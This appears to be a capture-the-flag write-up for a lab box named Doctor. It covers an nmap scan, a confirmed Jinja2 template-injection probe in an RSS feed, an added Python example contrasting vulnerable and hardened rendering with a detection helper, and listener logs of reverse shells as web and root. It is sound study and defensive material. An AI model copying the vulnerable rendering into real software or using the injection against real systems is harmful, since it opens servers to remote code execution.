```
# Nmap 7.91 scan initiated Sun Feb 14 19:31:04 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.056s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-06T15:57:27
| Not valid after:  2023-09-06T15:57:27
| MD5:   db23 4e5c 546d 8895 0f5f 8f42 5e90 6787
|_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 14 19:33:51 2021 -- 1 IP address (1 host up) scanned in 166.52 seconds
```
We can try to inject an SSTI payload to see if it is executed and reflected.
As the box is not realistic and most challenge "developers" only know
Python and never try another language, it's almost safe to assume the
web app is coded in Python and the template engine is Jinja2.
Let's try `{{ 7*7 }}`: in the RSS feed we can see `<item><title>49</title></item>`,
so we know the payload is executed.
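To show why `{{ 7*7 }}` comes back as `49` and what the fix looks like, here is an added example (mine, not code from the box or the writeup). It assumes the `jinja2` package is installed; the function names and the RSS item template are hypothetical stand-ins for whatever the box's app actually does. It also shows the caveat that Jinja2's `SandboxedEnvironment` still evaluates injected expressions, so it is a hardening layer and not a fix for the injection itself; the real fix is to keep user input out of the template source and pass it as a context variable.

```python
"""Vulnerable vs. hardened Jinja2 rendering of an RSS item (added example).

Assumes: the jinja2 package is installed. All names below are hypothetical
and do not come from the target application.
"""
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment

# Constant template: the title is a *variable*, never part of the source.
RSS_ITEM_TEMPLATE = "<item><title>{{ title }}</title></item>"


def vulnerable_rss_item(user_title: str) -> str:
    """BUG: user input is concatenated into the template SOURCE.

    Jinja2 compiles whatever it is handed, so any {{ ... }} the user wrote is
    evaluated. "{{ 7*7 }}" renders as "49", which is exactly the tell seen
    in the feed.
    """
    template_source = "<item><title>" + user_title + "</title></item>"
    return Environment().from_string(template_source).render()


def sandboxed_rss_item(user_title: str) -> str:
    """CAVEAT: the sandbox only restricts what an expression may reach
    (unsafe attributes, internals); plain expressions are still evaluated,
    so "{{ 7*7 }}" still becomes "49". Not a fix for the injection."""
    template_source = "<item><title>" + user_title + "</title></item>"
    return SandboxedEnvironment().from_string(template_source).render()


def hardened_rss_item(user_title: str) -> str:
    """FIX: the template is a constant and user input is passed as context.

    The input is treated as data: template delimiters are left untouched
    and, with autoescape on, HTML metacharacters are escaped for the XML
    feed as well.
    """
    env = Environment(autoescape=True)
    return env.from_string(RSS_ITEM_TEMPLATE).render(title=user_title)


def looks_like_template_injection(value: str) -> bool:
    """Detection helper for WAF rules or input logging: flags values that
    carry Jinja/Twig-style delimiters. A heuristic, not a substitute for
    the fix above."""
    return any(marker in value for marker in ("{{", "}}", "{%", "%}"))


if __name__ == "__main__":
    probe = "{{ 7*7 }}"  # constructed test input
    print("vulnerable:", vulnerable_rss_item(probe))
    print("sandboxed: ", sandboxed_rss_item(probe))
    print("hardened:  ", hardened_rss_item(probe))
    print("flagged:   ", looks_like_template_injection(probe))
```

Run it and compare the three outputs: only the hardened version returns the probe string verbatim, which is the behaviour a defender expects when the same `{{ 7*7 }}` test is replayed against a fixed application.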
Let's directly try a simple RCE to get a reverse shell:
After triggering the RSS feed I received the connection on my listener:
```
$ pwncat -l 9999 -vv
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.10.209:50334 (family 2/IPv4, TCP)
bash: cannot set terminal process group (864): Inappropriate ioctl for device
bash: no job control in this shell
web@doctor:~$
```
```
$ pwncat -l 8888 -vv
INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.10.209:35294 (family 2/IPv4, TCP)
bash: cannot set terminal process group (1143): Inappropriate ioctl for device
bash: no job control in this shell
root@doctor:/# id
uid=0(root) gid=0(root) groups=0(root)
```